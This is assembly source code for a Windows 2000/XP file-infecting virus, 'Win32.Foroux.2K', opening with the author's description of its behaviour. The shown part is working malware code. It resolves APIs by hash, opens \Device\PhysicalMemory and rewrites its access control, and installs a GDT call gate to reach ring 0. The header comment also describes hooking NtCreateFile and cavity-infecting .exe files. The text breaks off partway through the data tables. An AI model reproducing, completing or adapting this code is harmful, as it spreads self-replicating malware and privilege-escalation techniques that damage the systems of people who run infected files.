comment $
Win32.Foroux.2K
This is the source code of a virus.
This is a Win2K/XP ring 0 PE virus,by WQ.
It took me only four days to code this virus, so there will be many bugs in it.
First, when it runs, it will try to switch from ring 3 to ring 0. The routine entering ring 0 is from someone else's C code--I only rewrote it in asm.
The routine that searches for the API addresses in memory is copied from Win32.Foroux.A (alias Elkern.C, another PE virus of mine); it's a very good routine.
The infection method is the same as in the whole Elkern family--cavity infection. It will insert pieces of itself into the cavities of the host file, but if there is not enough room for them, it will append to the tail of the host file.
After it has entered ring 0, it will hook NtCreateFile by modifying KeServiceDescriptorTable, and any file-open action will be intercepted. It only infects PE files with the .exe extension.
It can't work on Win2K with the /3G switch because it only searches for the ntoskrnl base address between 80400000h and 80500000h.
$
.386p
.model flat
include win32.inc
includelib import32.lib
extrn MessageBoxA: proc
extrn ExitProcess: proc
extrn CreateProcessA: proc
DEBUG equ 1
if DEBUG
include debug.asm
endif
SECTION_QUERY equ 0001h
SECTION_MAP_WRITE equ 0002h
SECTION_MAP_READ equ 0004h
SECTION_MAP_EXECUTE equ 0008h
SECTION_EXTEND_SIZE equ 0010h
FILE_MAP_COPY equ SECTION_QUERY
FILE_MAP_WRITE equ SECTION_MAP_WRITE
FILE_MAP_READ equ SECTION_MAP_READ
HASH16FACTOR = 0ED388320h
HASH16 MACRO String,sym
HASH_Reg = 0FFFFFFFFh
IRPC _x, <String>
Ctrl_Byte = ('&_x&' XOR (HASH_Reg AND 0FFh))
HASH_Reg = (HASH_Reg SHR 8)
REPT 8
Ctrl_Byte = (Ctrl_Byte SHR 1) XOR (HASH16FACTOR * (Ctrl_Byte AND 1))
ENDM
HASH_Reg = (HASH_Reg XOR Ctrl_Byte)
ENDM
sym DW (HASH_Reg AND 0FFFFh)
ENDM
UNICODE_STR macro str
irpc _c,<str>
db '&_c'
db 0
endm
endm
BUFSIZE = 8192
INF_SIGN equ 'QW'
INF_MIN_BLK_SIZE equ 38h
MAX_BLK_NUM equ 100
MEM_INF_POS equ 1ch
POSPARAM equ 0e08h or ((PosInfo-NewNCF_IP) shl 16)
BASPARAM equ 0424h or ((BasInfo-NewNCF_IP) shl 16)
STDPARAM equ 051ch or ((StdInfo-NewNCF_IP) shl 16)
.data
cap db 'Haha',0
.code
vir_header:
dd 0
dw VirSize
dw 'QW'
_start:
call _start_ip_0
_start_ip_0:
_start_ip equ k32_hash_table
pop ebp
add ebp,k32_hash_table-_start_ip_0
mov ebx,[esp]
cmp ebx,80000000h
ja goto_host
lea edi,[ebp+k32_hash_table-8-_start_ip]
and ebx,0ffe00000h ;98-BFF70000,2K-77E80000,XP-77E60000
call search_api_addr
call _start_1
db 'ntdll',0
_start_1:
call [ebp+addrLoadLibraryA-_start_ip]
or eax,eax
jz goto_host
mov ebx,eax
lea edi,[ebp+ntdll_hash_table-8-_start_ip]
call search_api_addr
call _start_2
db 'advapi32',0
_start_2:
call [ebp+addrLoadLibraryA-_start_ip]
or eax,eax
jz goto_host
mov ebx,eax
lea edi,[ebp+advapi_hash_table-8-_start_ip]
call search_api_addr
push large 4 ;PAGE_READWRITE
push large 1000h ;MEM_COMMIT
push large VirSize*2
push large 0
call [ebp+addrVirtualAlloc-_start_ip]
or eax,eax
jz goto_host
mov [ebp+vir_mem-_start_ip],eax
merge_code_ip equ _start_ip
cld
lea esi,[ebp+_start-merge_code_ip]
mov edi,eax
; lea edx,[ebp+_start_ip-merge_code_ip]
mov edx,ebp
sub edx,[ebp+host_section_rva-merge_code_ip]
sub esi,edx
merge_code_loop:
add esi,edx
movzx ecx,word ptr [esi-4]
push esi
rep movsb
pop esi
mov esi,[esi-8]
or esi,esi
jnz short merge_code_loop
merge_code_end:
lea edx,[ebp+objnamestr-_start_ip]
mov [ebp+objnameptr-_start_ip],edx
lea edi,[ebp+ObjAttr-_start_ip]
and di,0fffch ;align to 4 bytes,or ZwOpenSection will fail
push edi
push large 24
pop ecx
push ecx
xor eax,eax
rep stosb
pop ecx
pop edi
mov esi,edi
stosd
mov [esi],ecx
stosd
lea eax,[edx-8]
stosd
mov dword ptr [edi],240h
push esi
push large 6 ;SECTION_MAP_READ|SECTION_MAP_WRITE
lea edi,[ebp+hSection-_start_ip]
push edi
call [ebp+addrZwOpenSection-_start_ip]
or eax,eax ;STATUS_SUCCESS?
jz OpenSectionOK ;Yes
push esi
push large 00060000h ;READ_CONTROL|WRITE_DAC
push edi
call [ebp+addrZwOpenSection-_start_ip]
push esi
xor eax,eax
push eax
mov ebx,esp
push eax
mov esi,esp
push ebx
push eax
push esi
push eax
push eax
push large 4 ;DACL_SECURITY_INFORMATION
push large 6 ;SE_KERNEL_OBJECT
push dword ptr [edi]
call [ebp+addrGetSecurityInfo-_start_ip]
;eAccess db
;02h,00h,00h,00h, 01h,00h,00h,00h,
;00h,00h,00h,00h, 00h,00h,00h,00h,
;00h,00h,00h,00h, 01h,00h,00h,00h,
;01h,00h,00h,00h, 50h,90h,41h,00h
push large 32
pop ecx
lea edi,[ebp+eAccess-_start_ip]
push edi
xor al,al
rep stosb
pop edi
inc al
mov byte ptr [edi],2
mov [edi+4],al
mov [edi+20],al
mov [edi+24],al
call _start_3
db 'CURRENT_USER',0
_start_3:
pop dword ptr [edi+28]
push ecx
push esp
push dword ptr [esi]
push edi
push large 1
call [ebp+addrSetEntriesInAclA-_start_ip]
xor eax,eax
mov ebx,[esp]
push eax
push ebx
push eax
push eax
push large 4 ;DACL_SECURITY_INFORMATION
push large 6 ;SE_KERNEL_OBJECT
mov edi,[ebp+hSection-_start_ip]
push edi
call [ebp+addrSetSecurityInfo-_start_ip]
push edi
call [ebp+addrZwClose-_start_ip]
add esp,12
push large 6 ;SECTION_MAP_READ|SECTION_MAP_WRITE
lea edi,[ebp+hSection-_start_ip]
push edi
call [ebp+addrZwOpenSection-_start_ip]
or eax,eax ;STATUS_SUCCESS?
jnz goto_host ;No
OpenSectionOK:
lea edi,[ebp+gGdt-_start_ip]
sgdt [edi]
inc dword ptr [edi]
movzx esi,word ptr [edi]
mov ebx,esi
mov eax,[edi+2]
cmp eax,80000000h
jc ring0_end1
cmp eax,0a0000000h
ja ring0_end1
and eax,1ffff000h
push esi
push eax
push large 0
push large FILE_MAP_READ or FILE_MAP_WRITE
push dword ptr [ebp+hSection-_start_ip]
call [ebp+addrMapViewOfFile-_start_ip]
or eax,eax
jz ring0_end1
mov ecx,esi
shr ecx,3
dec ecx
dec ebx
and bl,0f8h
lea edi,[eax+ebx]
FindGdtLoop:
sub edi,8
test byte ptr [edi+5],0fh
loopnz FindGdtLoop
jnz ring0_end1
add edi,8
lea ecx,[ebp+Ring0Entry-_start_ip]
lea esi,[ebp+CallGate-_start_ip]
mov word ptr [esi],cx
shr ecx,10h
mov word ptr [esi+6],cx
push edi
push large 2
pop ecx
rep movsd
pop edi
mov ecx,edi
sub ecx,eax
or cl,3
lea ebx,[ebp+calladdr-_start_ip]
mov [ebx+4],cx
push large VirSize
push ebp ;->_start
call [ebp+addrVirtualLock-_start_ip]
or eax,eax
jz ring0_end1
push large VirSize
push dword ptr [ebp+vir_mem-_start_ip]
call [ebp+addrVirtualLock-_start_ip]
or eax,eax
jz ring0_end1
call [ebp+addrGetCurrentThread-_start_ip]
mov esi,eax
push large 15 ;THREAD_PRIORITY_TIME_CRITICAL
push eax
call [ebp+addrSetThreadPriority-_start_ip]
push large 0
call [ebp+addrSleep-_start_ip]
call fword ptr [ebx]
push large 0 ;THREAD_PRIORITY_NORMAL
push esi
call [ebp+addrSetThreadPriority-_start_ip]
xor eax,eax
stosd
stosd
push large VirSize
push dword ptr [ebp+vir_mem-_start_ip]
call [ebp+addrVirtualUnlock-_start_ip]
push large VirSize
push ebp ;->_start
call [ebp+addrVirtualUnlock-_start_ip]
ring0_end1:
push dword ptr [ebp+hSection-_start_ip]
call [ebp+addrZwClose-_start_ip]
goto_host:
sub ebp,1000h+_start_ip-vir_header
host_section_rva equ dword ptr $-4
add ebp,offset host-400000h
host_entry_rva equ dword ptr $-4
push ebp
retn
init_data:
align 4
objname dw objnamestr_size,objnamestr_size+2
objnameptr dd 0
objnamestr equ this byte
UNICODE_STR <\Device\PhysicalMemory>
objnamestr_size equ $-objnamestr
CallGate db 00h,00h,08h,00h,00,0ECh,00h,00h
gGdt equ $
db 3 dup (0)
ObjAttr db 24 dup (0)
; hSection dd 0
; gGdt dw 3 dup (0)
; calladdr dw 3 dup (038h)
; eAccess db 32 dup (0)
db 'KERNEL32'
k32_hash_table equ this word
HASH16 <LoadLibraryA>,hsLoadLibraryA
HASH16 <MapViewOfFile>,hsMapViewOfFile
HASH16 <GetCurrentThread>,hsGetCurrentThread
HASH16 <SetThreadPriority>,hsSetThreadPriority
HASH16 <Sleep>,hsSleep
HASH16 <VirtualLock>,hsVirtualLock
HASH16 <VirtualAlloc>,hsVirtualAlloc
HASH16 <VirtualUnlock>,hsVirtualUnlock
if DEBUG
HASH16 <OutputDebugStringA>,hsOutputDebugStringA
HASH16 <GetLastError>,hsGetLastError
HASH16 <ExitProcess>,hsExitProcess
endif
dw 0
k32_hash_addr equ this dword
hHandle equ $
hSection equ $
calladdr equ $-4
addrLoadLibraryA dd 0
addrMapViewOfFile dd 0
addrGetCurrentThread dd 0
addrSetThreadPriority dd 0
addrSleep dd 0